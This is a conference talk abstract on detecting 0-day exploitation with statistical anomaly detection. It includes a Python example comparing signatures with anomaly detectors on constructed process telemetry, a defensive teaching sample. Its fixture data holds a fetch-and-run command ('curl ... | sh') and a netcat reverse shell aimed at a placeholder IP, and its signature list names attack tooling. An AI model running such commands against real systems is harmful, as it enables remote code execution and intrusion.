Le Tour Du Hack

No Signature, No Problem: Detecting the Coming 0-Day Flood
2026-05-16, Track 1

AI models like Mythos are finding exploitable vulnerabilities faster than the industry can disclose, patch, or write signatures for them. The inevitable consequence: a flood of 0-days in the wild. Every signature-based detection you own is, by definition, blind to them. This talk makes the case that statistical anomaly detection is no longer an optional "ML in security" side quest. It's the only class of detection that can catch the exploitation of things nobody knows exist yet. Drawing on production experience building ML detection, we'll cover what works, what doesn't, and why your UEBA tab isn't going to save you.


Detection engineering has always been a race: find a vuln, reverse the exploit, write a signature, push it out, hope you beat the attackers. Defenders were losing that race even before automation. With AI-driven vulnerability discovery, the race is over. The discovery rate is about to dwarf the signature-authoring rate by orders of magnitude, and a meaningful fraction of those findings will be weaponised before any defender has them.
That leaves one brute mathematical fact: you cannot write a signature for something you don't know exists. The only detection strategy that survives this world is one that looks for the effects of exploitation rather than its fingerprints. Statistical anomaly detection.
In this talk we'll cover:

The supply-side economics of AI vuln discovery, and why 0-day proliferation is structurally inevitable rather than speculative
Why signature-based detection breaks down in this regime, with numbers
What "anomaly detection" actually means (time-series, graph, distribution-based), and the crucial distinctions most vendors blur
Real examples: detections that caught novel behaviour in production vs. the ones that generated 400 alerts a day
The analyst UX problem: explainability, triage, and why most ML detections die in the SOC
A pragmatic starting point for teams without a PhD on staff
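To make the distinction in the outline concrete, the following is an added example written for this page, not code from the talk, the speaker, or Alpha Level. It runs three detectors over constructed process-spawn telemetry (one web host, a week of baseline, then one day containing a post-exploitation spawn that matches no signature): a regex signature list, a distribution-based check (a child command never seen under that parent), and a time-series check on spawn volume, first against a pooled hourly baseline and then against an hour-of-day baseline. The host names, commands, signature patterns, the z-score threshold and the standard-deviation floor are all assumptions chosen for illustration.

```python
"""Added example: signature matching vs. statistical anomaly detection over
constructed process-spawn telemetry. Illustrative code for this page only."""
import re
import statistics
from collections import Counter, defaultdict

# Assumed signature list: known post-exploitation tooling, nothing else.
SIGNATURES = [re.compile(p, re.I) for p in (
    r"mimikatz", r"powershell.*-enc", r"\bnc\b.*-e\b")]

Z_THRESHOLD = 3.0  # assumed alerting threshold for the volume detector
MIN_STD = 1.0      # floor: a constant baseline (std 0) must not alarm on +1


def normal_spawns(hour):
    """Constructed 'normal' activity for one hour on web01 (hour % 24 = hour of day)."""
    events = [(hour, "web01", "java", "/usr/bin/logrotate")] * 2
    events += [(hour, "web01", "cron", "/usr/bin/find /tmp -mtime +1")]
    if hour % 24 == 3:  # scheduled nightly backup: a legitimate burst
        events += [(hour, "web01", "cron", "/bin/tar -czf /backup/web.tgz")] * 40
    return events


# Week 1 is the baseline; day 8 (hours 168..191) is the window we score.
TRAINING = [e for h in range(168) for e in normal_spawns(h)]
WINDOW = [e for h in range(168, 192) for e in normal_spawns(h)] + [
    # Constructed exploitation effect: the app server spawns a shell. No
    # signature matches it, because nothing here names a known tool.
    (180, "web01", "java", "/bin/sh -c 'curl http://203.0.113.7/s | sh'"),
    # Constructed known tooling that a signature does cover.
    (182, "web01", "sshd", "/tmp/nc -e /bin/sh 203.0.113.7 4444"),
]


def signature_alerts(events):
    """Return (event, pattern) for every event whose command matches a signature."""
    return [(e, pat.pattern) for e in events for pat in SIGNATURES if pat.search(e[3])]


def build_baseline(events, seasonal):
    """Per (host, parent): the set of seen child commands and a list of hourly
    spawn counts, zero-filled for quiet hours. With seasonal=True the counts are
    kept per hour-of-day; with seasonal=False all hours are pooled together."""
    children = defaultdict(set)
    per_hour = defaultdict(Counter)
    for hour, host, parent, child in events:
        children[(host, parent)].add(child)
        per_hour[(host, parent)][hour] += 1
    hours = range(min(e[0] for e in events), max(e[0] for e in events) + 1)
    series = defaultdict(lambda: defaultdict(list))
    for key, counts in per_hour.items():
        for hour in hours:
            series[key][hour % 24 if seasonal else 0].append(counts.get(hour, 0))
    return children, series, seasonal


def anomaly_alerts(window, baseline):
    """Return (kind, hour, host, parent, detail) alerts. The detail string is the
    explanation an analyst needs to triage the alert without rerunning the maths."""
    children, series, seasonal = baseline
    alerts = []
    # Distribution-based: a child command never seen under this (host, parent).
    for hour, host, parent, child in window:
        if child not in children.get((host, parent), set()):
            alerts.append(("novel-child", hour, host, parent, f"never seen: {child}"))
    # Time-series: spawn volume for (host, parent, hour) vs the baseline z-score.
    counts = Counter((hour, host, parent) for hour, host, parent, _ in window)
    for (hour, host, parent), n in sorted(counts.items()):
        hist = series.get((host, parent), {}).get(hour % 24 if seasonal else 0)
        if not hist or len(hist) < 2:
            continue  # no baseline to compare against; novel-child covers new pairs
        mean = statistics.fmean(hist)
        std = max(statistics.pstdev(hist), MIN_STD)
        z = (n - mean) / std
        if z > Z_THRESHOLD:
            alerts.append(("volume", hour, host, parent,
                           f"{n} spawns vs baseline {mean:.1f}+/-{std:.1f}, z={z:.1f}"))
    return alerts


if __name__ == "__main__":
    print("signatures:", signature_alerts(WINDOW))
    print("pooled baseline:", anomaly_alerts(WINDOW, build_baseline(TRAINING, False)))
    print("hour-of-day baseline:", anomaly_alerts(WINDOW, build_baseline(TRAINING, True)))
```

Run as written, the signature list fires only on the `nc -e` spawn, the novel-child check catches both the `nc` spawn and the java-to-shell spawn that no signature covers, and the volume check illustrates the "400 alerts a day" failure mode: against the pooled baseline the scheduled 03:00 backup burst scores z of about 4.8 and alarms every night, while the hour-of-day baseline sees it as normal and stays quiet. A single extra spawn under java never moves the volume score, which is why the distribution-based check has to sit beside the time-series one rather than replace it.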

This is a hardened follow-up to a talk given at Cyber Scotland Connect in 2025, updated for a world where vulnerability discovery itself has been automated.


How Technical Is Your Talk: 4 (Professional)

I'm a detection engineer based in Glasgow and a former Principal Security Engineer at Oracle. I've spent the last seven years working across banking, enterprise, and startup security teams, and currently lead detection at Alpha Level, an ML threat detection startup, alongside independent consulting work. I'm mostly drawn to the parts of security operations that don't have tidy answers yet.